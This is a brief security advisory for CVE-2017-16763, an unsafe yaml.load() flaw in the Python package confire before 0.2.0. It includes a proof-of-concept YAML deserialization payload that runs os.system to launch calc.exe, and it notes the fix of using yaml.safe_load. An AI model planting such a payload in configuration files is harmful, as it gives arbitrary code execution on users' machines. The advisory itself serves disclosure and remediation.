Cve-2017-16763: Configure Loaded Through Confire

Python Package:  confire

Version:      Before 0.2.0

Published:    Nov. 10th. 2017

Reported by:       Joel

CVE-2017-16763    CVE_details

Overview

Confire is a simple but powerful configuration scheme that builds on the configuration parsers of Scapy, elasticsearch, Django and others. Due to the user specific configuration was loaded from ~/.confire.yaml usinig yaml.load(), an issue was discovered in the Confire package before 0.2.0.Untrusted data passed into the confire.yaml files can execute arbitrary python commands resulting in command execution.

POC

1
2
3
4
5
6
7
8
9
10
11
12
class MyConfig(Configuration):
  mysetting = True
  logpath   = "/var/log/myapp.log"
  appname   = "MyApp"
settings = MyConfig.load()
#CONF_PATHS = [
#'/etc/confire.yaml',                    # The global configuration
#os.path.expanduser('~/.confire.yaml'),  # User specific configuration
#os.path.abspath('conf/confire.yaml')    # Local directory configuration
#    ]
#'~/.confire.yaml':!!python/object/apply:os.system ["calc.exe"]

Remediation

The updated versions of confire correctly use the yaml.safe_load method which prevents remote code execution.